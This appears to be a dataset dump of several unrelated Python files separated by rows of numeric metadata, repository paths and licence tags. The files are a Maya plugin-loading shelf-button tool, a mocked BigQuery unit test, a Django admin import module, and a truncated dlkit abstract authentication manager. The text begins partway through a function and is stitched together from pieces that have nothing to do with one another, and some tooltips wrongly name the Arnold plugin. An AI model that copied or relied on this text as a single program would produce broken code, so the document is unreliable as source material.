create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['MASH']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n 
if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='MASH', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">MASH</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_xgen():
''' Create a button for manually loading the xGen plugin '''
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = ['xgenToolkit']\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins 
are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='xGen', tooltip='This button will try to load Arnold in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">xGen</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
def add_button_custom(text_field_data):
'''
Create a button for manually loading a custom 3rd party plugin
Parameters:
text_field_data (string): The input text containing the name of the plugins you want to load.
'''
plugins_to_load = '['
is_text_valid = True
if len(text_field_data) <= 0:
is_text_valid = False
cmds.warning('The input text is empty, please type the name of the plugin you want to load. (e.g. "mtoa" for Arnold)')
if is_text_valid:
return_list = text_field_data.replace(' ','').split(",")
empty_objects = []
for obj in return_list:
if '' == obj:
empty_objects.append(obj)
for obj in empty_objects:
return_list.remove(obj)
for item in return_list:
plugins_to_load += '\'' + item + '\', '
if plugins_to_load != '[':
plugins_to_load = plugins_to_load[:-2] + ']'
else:
plugins_to_load = plugins_to_load + ']'
if plugins_to_load == '[]':
cmds.warning('The input text is invalid. Please make sure you typed the name of every plugin separated by commas.')
else:
create_shelf_button("\"\"\"\n This button was generated using GT Startup Booster\n @Guilherme Trevisan - github.com/TrevisanGMW\n\n This button will try to load a plugin in case it's not already loaded.\n This is used to make Maya open faster by not auto loading heavy plugins during startup.\n \n How to use it:\n 1. Use GT Startup Booster and turn off \"Auto Load\" for the plugins you want to manually load.\n 2. Click on \"Add Shelf Button\" so it creates a shortcut for loading the plugin.\n 3. When you need the plugin, use the shelf button to load it.\n \n\"\"\"\nimport maya.cmds as cmds\nimport sys\n\nplugins_to_load = " + plugins_to_load + "\n\ndef gtu_load_plugins(plugin_list):\n ''' \n Attempts to load provided plug-ins, then gives the user feedback about their current state. (Feedback through inView messages and stdout.write messages)\n \n Parameters:\n plugin_list (list): A list of strings containing the name of the plug-ings yo uwant to load\n \n '''\n already_loaded = []\n not_installed = []\n now_loaded = []\n \n # Load Plug-in\n for plugin in plugin_list:\n if not cmds.pluginInfo(plugin, q=True, loaded=True):\n try:\n cmds.loadPlugin(plugin)\n if cmds.pluginInfo(plugin, q=True, loaded=True):\n now_loaded.append(plugin)\n except:\n not_installed.append(plugin)\n else:\n already_loaded.append(plugin)\n \n # Give Feedback\n if len(not_installed) > 0:\n message_feedback = ''\n for str in not_installed:\n message_feedback += str + ', '\n is_plural = 'plug-ins don\\'t'\n if len(not_installed) == 1:\n is_plural = 'plug-in doesn\\'t'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' seem to be installed.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' seem to be installed.')\n \n if len(now_loaded) > 0:\n message_feedback = ''\n for str in now_loaded:\n message_feedback += str + ', '\n is_plural = 
'plug-ins are'\n if len(now_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;text-decoration:underline;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' now loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' now loaded.')\n \n if len(already_loaded) > 0:\n message_feedback = ''\n for str in already_loaded:\n message_feedback += str + ', '\n is_plural = 'plug-ins are'\n if len(already_loaded) == 1:\n is_plural = 'plug-in is'\n message = '<span style=\\\"color:#FF0000;\\\">' + message_feedback[:-2] + '</span> ' + is_plural + ' already loaded.'\n cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)\n sys.stdout.write(message_feedback[:-2] + ' ' + is_plural + ' already loaded.')\n\n\n# Run Script\nif __name__ == '__main__':\n gtu_load_plugins(plugins_to_load)" ,
label='Custom', tooltip='This button will try to load a custom plugin in case it\'s not already loaded.', image='openScript.png')
cmds.inViewMessage(amg='<span style=\"color:#FFFF00;\">A custom</span> load button was added to your current shelf.', pos='botLeft', fade=True, alpha=.9)
# Initial Refresh
#refresh_startup_booster_ui()
# Show and Lock Window
cmds.showWindow(build_gui_startup_booster)
cmds.window(build_gui_startup_booster, e=True, s=False)
# Remove the focus from the textfield and give it to the window
cmds.setFocus(build_gui_startup_booster)
# Set Window Icon
qw = omui.MQtUtil.findWindow(build_gui_startup_booster)
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/out_time.png')
widget.setWindowIcon(icon)
# main dialog Ends Here =================================================================================
def create_shelf_button(command,
                        label='',
                        name=None,
                        tooltip='',
                        image=None,  # Default Python Icon
                        label_color=(1, 0, 0),  # Default Red
                        label_bgc_color=(0, 0, 0, 1),  # Default Black
                        bgc_color=None
                        ):
    '''
    Add a shelf button to the current shelf (according to the provided parameters)

    Parameters:
        command (str): A string containing the code or command you want the button to run when clicking on it. E.g. "print("Hello World")"
        label (str): The label of the button. This is the text you see below it.
        name (str): The name of the button as seen inside the shelf editor.
        tooltip (str): The help message you get when hovering the button.
        image (str): The image used for the button (defaults to Python icon if none)
        label_color (tuple): A tuple containing three floats, these are RGB 0 to 1 values to determine the color of the label.
        label_bgc_color (tuple): A tuple containing four floats, these are RGBA 0 to 1 values to determine the background of the label.
        bgc_color (tuple): A tuple containing three floats, these are RGB 0 to 1 values to determine the background of the icon

    Returns:
        str: The name of the created shelf button, or None if no shelf is currently visible.
    '''
    # BUG FIX: cmds.about(v=True) returns a *string* (e.g. '2020'); the original
    # compared it directly against int literals, which is always True under
    # Python 2's mixed-type ordering and raises TypeError under Python 3.
    # Parse the leading digits into an int before comparing.
    try:
        maya_version = int(str(cmds.about(v=True))[:4])
    except ValueError:
        maya_version = 2020  # unrecognized version format; assume a modern Maya
    shelf_top_level = mel.eval('$temp=$gShelfTopLevel')
    if not cmds.tabLayout(shelf_top_level, exists=True):
        cmds.warning('Shelf is not visible')
        return
    if not image:
        image = 'pythonFamily.png'
    shelf_tab = cmds.shelfTabLayout(shelf_top_level, query=True, selectTab=True)
    shelf_tab = shelf_top_level + '|' + shelf_tab
    # Populate extra arguments according to the current Maya version
    kwargs = {}
    if maya_version >= 2009:
        kwargs['commandRepeatable'] = True
    if maya_version >= 2011:
        kwargs['overlayLabelColor'] = label_color
        kwargs['overlayLabelBackColor'] = label_bgc_color
        if bgc_color:
            kwargs['enableBackground'] = bool(bgc_color)
            kwargs['backgroundColor'] = bgc_color
    return cmds.shelfButton(parent=shelf_tab, label=label, command=command,
                            imageOverlayLabel=label, image=image, annotation=tooltip,
                            width=32, height=32, align='center', **kwargs)
def build_gui_help_startup_booster():
    ''' Builds the Help UI for GT Startup Booster.

    Creates (or recreates) a non-resizable window named
    "build_gui_help_startup_booster" containing usage instructions,
    author/contact links and an OK button that closes the window.
    '''
    window_name = "build_gui_help_startup_booster"
    # Delete any previous instance so the window is always rebuilt fresh
    if cmds.window(window_name, exists=True):
        cmds.deleteUI(window_name, window=True)
    cmds.window(window_name, title= script_name + " Help", mnb=False, mxb=False, s=True)
    cmds.window(window_name, e=True, s=True, wh=[1,1])
    main_column = cmds.columnLayout(p= window_name)
    # Title Text
    cmds.separator(h=12, style='none') # Empty Space
    cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p=main_column) # Window Size Adjustment
    cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p=main_column) # Title Column
    cmds.text(script_name + " Help", bgc=[.4,.4,.4], fn="boldLabelFont", align="center")
    cmds.separator(h=10, style='none', p=main_column) # Empty Space
    # Body ====================
    help_font = 'smallPlainLabelFont'
    cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
    cmds.text(l=script_name + ' helps decrease the time Maya\n takes to load before becoming fully functional', align="center")
    cmds.separator(h=10, style='none') # Empty Space
    cmds.text(l='How It works:', align="center", fn="boldLabelFont")
    cmds.text(l='Not all plugins are used every time Maya is opened,\n but they are usually still loaded during startup.\n This causes the startup time to be quite slow.', align="center", font=help_font)
    cmds.separator(h=5, style='none') # Empty Space
    cmds.text(l='This script aims to fix that, by helping you skip the heavy \nplugins while still having easy access to them.', align="center", font=help_font)
    cmds.separator(h=5, style='none') # Empty Space
    cmds.text(l='1st: Optimize\n2nd: Create Shelf Buttons\n3rd: Enjoy faster startups', align="center", font=help_font)
    cmds.separator(h=10, style='none') # Empty Space
    cmds.text(l='Plugin List:', align="center", fn="boldLabelFont")
    cmds.text(l='This is a list of common plugins that are\n usually automatically loaded by default.', align="center", font=help_font)
    cmds.text(l='Plugin File: Name of the file used by the plugin.\nAuto Load: Is this plugin automatically loading?\nInstalled: Is the plugin installed?\nControl: General name of the plugin.', align="center", font=help_font)
    cmds.separator(h=10, style='none') # Empty Space
    cmds.text(l='"Shelf Button" and "Auto Load" Buttons:', align="center", fn="boldLabelFont")
    cmds.text(l='Shelf Button: Creates a Shelf Button (under the current shelf)\nto load the plugin and give you feedback on its current state.', align="center", font=help_font)
    cmds.separator(h=5, style='none') # Empty Space
    cmds.text(l='Auto Load: Toggles the Auto Load function of the plugin.\n(same as "Auto Load" in the plugin manager)', align="center", font=help_font)
    cmds.separator(h=10, style='none') # Empty Space
    cmds.text(l='Custom Shelf Button:', align="center", fn="boldLabelFont")
    cmds.text(l='This script couldn\'t account for every heavy 3rd party plug-in.\nThis shouldn\'t be an issue as you can manually add any plugin.', align="center", font=help_font)
    cmds.text(l='Just manually deactivate your third party plugin by going to \n"Windows > Settings/Preferences > Plug-in Manager"', align="center", font=help_font)
    cmds.separator(h=5, style='none') # Empty Space
    cmds.text(l='Then create a custom load button using\n the textField that says "Other Plugins"', align="center", font=help_font)
    cmds.separator(h=15, style='none') # Empty Space
    cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
    cmds.text('Guilherme Trevisan ')
    cmds.text(l='<a href="mailto:trevisangmw@gmail.com">TrevisanGMW@gmail.com</a>', hl=True, highlightColor=[1,1,1])
    cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
    cmds.separator(h=15, style='none') # Empty Space
    cmds.text(l='<a href="https://github.com/TrevisanGMW">Github</a>', hl=True, highlightColor=[1,1,1])
    cmds.separator(h=7, style='none') # Empty Space
    # Close Button
    cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
    cmds.separator(h=5, style='none')
    # The lambda resolves close_help_gui at click time, so defining it below is safe
    cmds.button(l='OK', h=30, c=lambda args: close_help_gui())
    cmds.separator(h=8, style='none')
    # Show and Lock Window
    cmds.showWindow(window_name)
    cmds.window(window_name, e=True, s=False)
    # Set Window Icon
    qw = omui.MQtUtil.findWindow(window_name)
    # NOTE(review): long() is Python-2 only — confirm target interpreter before porting to Python 3
    widget = wrapInstance(long(qw), QWidget)
    icon = QIcon(':/question.png')
    widget.setWindowIcon(icon)
    def close_help_gui():
        ''' Closes the help window if it still exists. '''
        if cmds.window(window_name, exists=True):
            cmds.deleteUI(window_name, window=True)
# Build UI only when the script is executed directly (not on import)
if __name__ == "__main__":
    build_gui_startup_booster()
| 89.25741
| 3,412
| 0.611756
| 7,699
| 57,214
| 4.424341
| 0.063125
| 0.005402
| 0.007398
| 0.016029
| 0.809764
| 0.787423
| 0.769809
| 0.747644
| 0.726712
| 0.716878
| 0
| 0.0209
| 0.244853
| 57,214
| 641
| 3,413
| 89.25741
| 0.767504
| 0.059041
| 0
| 0.340961
| 0
| 0.086957
| 0.549334
| 0.122314
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0.002288
| 0.04119
| 0
| 0.089245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c1b335adbfc2682edbdb11db26a4ef61d1930f4a
| 4,821
|
py
|
Python
|
tests/slo/predicate/test_sli_table_exists_predicate.py
|
Morgenz/bbq
|
f0fd3f626841c610aee80ad08a61123b7cccb775
|
[
"Apache-2.0"
] | 41
|
2018-05-08T11:54:37.000Z
|
2022-02-09T21:19:17.000Z
|
tests/slo/predicate/test_sli_table_exists_predicate.py
|
Morgenz/bbq
|
f0fd3f626841c610aee80ad08a61123b7cccb775
|
[
"Apache-2.0"
] | 139
|
2018-06-07T13:45:21.000Z
|
2021-04-30T20:44:06.000Z
|
tests/slo/predicate/test_sli_table_exists_predicate.py
|
Morgenz/bbq
|
f0fd3f626841c610aee80ad08a61123b7cccb775
|
[
"Apache-2.0"
] | 5
|
2019-09-11T12:28:24.000Z
|
2022-02-04T21:38:29.000Z
|
import unittest
from mock import Mock, patch
from src.slo.backup_creation_latency.latency_query_specification import \
LatencyQuerySpecification
from src.slo.predicate.sli_table_exists_predicate import SLITableExistsPredicate
from src.commons.big_query.big_query import BigQuery
class TestSLITableExistsPredicate(unittest.TestCase):
    """Unit tests for SLITableExistsPredicate.exists().

    All BigQuery access is mocked: BigQuery.__init__ is neutralized and
    get_table / list_table_partitions are patched per test to simulate the
    table state (missing, non-partitioned, partitioned with/without
    partitions, schema missing).
    """

    @patch('src.commons.big_query.big_query.BigQuery.__init__',
           Mock(return_value=None))
    @patch('src.commons.big_query.big_query.BigQuery.get_table',
           Mock(return_value=None))
    def test_should_return_false_for_not_existing_table(self):
        """get_table returning None means the table is missing."""
        # given
        sli_table = self.__create_non_partitioned_sli_table()
        # when
        exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
        # then
        self.assertFalse(exists)

    @patch('src.commons.big_query.big_query.BigQuery.__init__',
           Mock(return_value=None))
    @patch('src.commons.big_query.big_query.BigQuery.get_table',
           Mock(return_value={'projectId': 'p', 'schema': {'fields': []}}))
    def test_should_return_true_for_existing_table(self):
        """A table with a schema and no partitioning counts as existing."""
        # given
        sli_table = self.__create_non_partitioned_sli_table()
        # when
        exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
        # then
        self.assertTrue(exists)

    @patch('src.commons.big_query.big_query.BigQuery.__init__',
           Mock(return_value=None))
    @patch('src.commons.big_query.big_query.BigQuery.get_table',
           Mock(return_value={'projectId': 'p', 'schema': {'fields': []},
                              'timePartitioning': {'type': 'DAY'}}))
    @patch('src.commons.big_query.big_query.BigQuery.list_table_partitions',
           Mock(return_value=[]))
    def test_should_return_false_for_not_existing_partition(self):
        """A partitioned table with no partitions listed does not satisfy the predicate."""
        # given
        sli_table = self.__create_partitioned_sli_table()
        # when
        exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
        # then
        self.assertFalse(exists)

    @patch('src.commons.big_query.big_query.BigQuery.__init__',
           Mock(return_value=None))
    @patch('src.commons.big_query.big_query.BigQuery.get_table',
           Mock(return_value={'projectId': 'p', 'schema': {'fields': []}}))
    @patch('src.commons.big_query.big_query.BigQuery.list_table_partitions',
           Mock(return_value=[{'partitionId': '20180808'}]))
    def test_should_return_true_for_existing_partition(self):
        """The requested partitionId ('20180808') appears in the listed partitions."""
        # given
        sli_table = self.__create_partitioned_sli_table()
        # when
        exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
        # then
        self.assertTrue(exists)

    @patch('src.commons.big_query.big_query.BigQuery.__init__',
           Mock(return_value=None))
    @patch('src.commons.big_query.big_query.BigQuery.get_table',
           Mock(return_value={'projectId': 'p'}))
    def test_should_return_false_when_there_is_no_schema(self):
        """A table payload without a 'schema' key is treated as not existing."""
        # given
        sli_table = self.__create_non_partitioned_sli_table()
        # when
        exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
        # then
        self.assertFalse(exists)

    @patch('src.commons.big_query.big_query.BigQuery.__init__',
           Mock(return_value=None))
    @patch('src.commons.big_query.big_query.BigQuery.get_table',
           Mock(return_value={'projectId': 'p', 'schema': {'fields': []}}))
    @patch.object(BigQuery, 'list_table_partitions')
    def test_should_not_list_partitions_in_non_partitioned_table(self, list_table_partitions):
        """Partition listing must be skipped entirely for non-partitioned tables."""
        # given
        sli_table = self.__create_non_partitioned_sli_table()
        # when
        exists = SLITableExistsPredicate(BigQuery(), LatencyQuerySpecification).exists(sli_table)
        # then
        self.assertTrue(exists)
        list_table_partitions.assert_not_called()

    def __create_non_partitioned_sli_table(self):
        """Build a minimal SLI-table dict with partitionId=None (non-partitioned)."""
        return {
            "snapshotTime": None,
            "projectId": 'p',
            "datasetId": 'd',
            "tableId": 'd',
            "partitionId": None,
            "creationTime": '1500000000000',
            "lastModifiedTime": None,
            "backupCreated": None,
            "backupLastModified": None,
            "xDays": 4
        }

    def __create_partitioned_sli_table(self):
        """Build a minimal SLI-table dict targeting partition '20180808'."""
        return {
            "snapshotTime": None,
            "projectId": 'p',
            "datasetId": 'd',
            "tableId": 'd',
            "partitionId": '20180808',
            "creationTime": '1500000000000',
            "lastModifiedTime": None,
            "backupCreated": None,
            "backupLastModified": None,
            "xDays": 4
        }
| 36.522727
| 97
| 0.65671
| 503
| 4,821
| 5.912525
| 0.151093
| 0.080699
| 0.065568
| 0.090787
| 0.834902
| 0.823806
| 0.815064
| 0.797579
| 0.777404
| 0.777404
| 0
| 0.011806
| 0.226924
| 4,821
| 131
| 98
| 36.801527
| 0.786155
| 0.019705
| 0
| 0.704545
| 0
| 0
| 0.242881
| 0.157034
| 0
| 0
| 0
| 0
| 0.079545
| 1
| 0.090909
| false
| 0
| 0.056818
| 0.022727
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
de02e77c9a86e8e691b8f69a2e507bd04fe2d7d1
| 374
|
py
|
Python
|
product_management_models/product_supplies/admin.py
|
reimibeta/django-product-management-models
|
f51e94cc6ae605ea21706ffe2baedc53b980112f
|
[
"Apache-2.0"
] | null | null | null |
product_management_models/product_supplies/admin.py
|
reimibeta/django-product-management-models
|
f51e94cc6ae605ea21706ffe2baedc53b980112f
|
[
"Apache-2.0"
] | null | null | null |
product_management_models/product_supplies/admin.py
|
reimibeta/django-product-management-models
|
f51e94cc6ae605ea21706ffe2baedc53b980112f
|
[
"Apache-2.0"
] | null | null | null |
""" product supply """
from product_management_models.product_supplies.class_admins.product_supply_admin import *
""" product supply delivery """
from product_management_models.product_supplies.class_admins.product_supply_delivery_admin import *
""" product supply stock """
from product_management_models.product_supplies.class_admins.product_supply_stock_admin import *
| 41.555556
| 99
| 0.84492
| 46
| 374
| 6.434783
| 0.26087
| 0.263514
| 0.212838
| 0.273649
| 0.668919
| 0.668919
| 0.668919
| 0.668919
| 0.668919
| 0.668919
| 0
| 0
| 0.074866
| 374
| 8
| 100
| 46.75
| 0.855491
| 0.037433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
a9b935f3bc09eeb9bb71e8e25397532e112676ea
| 50,707
|
py
|
Python
|
dlkit/abstract_osid/authentication/managers.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/abstract_osid/authentication/managers.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/abstract_osid/authentication/managers.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""Implementations of authentication abstract base class managers."""
# pylint: disable=invalid-name
# Method names comply with OSID specification.
# pylint: disable=no-init
# Abstract classes do not define __init__.
# pylint: disable=too-few-public-methods
# Some interfaces are specified as 'markers' and include no methods.
# pylint: disable=too-many-public-methods
# Number of methods are defined in specification
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
# pylint: disable=too-many-arguments
# Argument signature defined in specification.
# pylint: disable=duplicate-code
# All apparent duplicates have been inspected. They aren't.
import abc
class AuthenticationProfile(metaclass=abc.ABCMeta):
    """The ``AuthenticationProfile`` describes the interoperability among authentication services."""
    # NOTE(review): the original declared ``__metaclass__ = abc.ABCMeta``, which is
    # Python 2 syntax and a silent no-op on Python 3, so none of the
    # @abc.abstractmethod decorators below were actually enforced.  Declaring the
    # metaclass in the class header restores abstract-method enforcement without
    # changing the visible interface.
    @abc.abstractmethod
    def supports_visible_federation(self):
        """Tests if federation is visible.
        :return: ``true`` if visible federation is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_authentication_acquisition(self):
        """Tests if authentication acquisition is supported.
        Authentication acquisition is responsible for acquiring client
        side authentication credentials.
        :return: ``true`` if authentication acquisition is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_authentication_validation(self):
        """Tests if authentication validation is supported.
        Authentication validation verifies given authentication
        credentials and maps to an agent identity.
        :return: ``true`` if authentication validation is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_lookup(self):
        """Tests if an agent lookup service is supported.
        An agent lookup service defines methods to access agents.
        :return: ``true`` if agent lookup is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_query(self):
        """Tests if an agent query service is supported.
        :return: ``true`` if agent query is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_search(self):
        """Tests if an agent search service is supported.
        :return: ``true`` if agent search is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_admin(self):
        """Tests if an agent administrative service is supported.
        :return: ``true`` if agent admin is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_notification(self):
        """Tests if agent notification is supported.
        Messages may be sent when agents are created, modified, or
        deleted.
        :return: ``true`` if agent notification is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_agency(self):
        """Tests if retrieving mappings of agents and agencies is supported.
        :return: ``true`` if agent agency mapping retrieval is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_agency_assignment(self):
        """Tests if managing mappings of agents and agencies is supported.
        :return: ``true`` if agent agency assignment is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agent_smart_agency(self):
        """Tests if agent smart agency is available.
        :return: ``true`` if agent smart agency is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
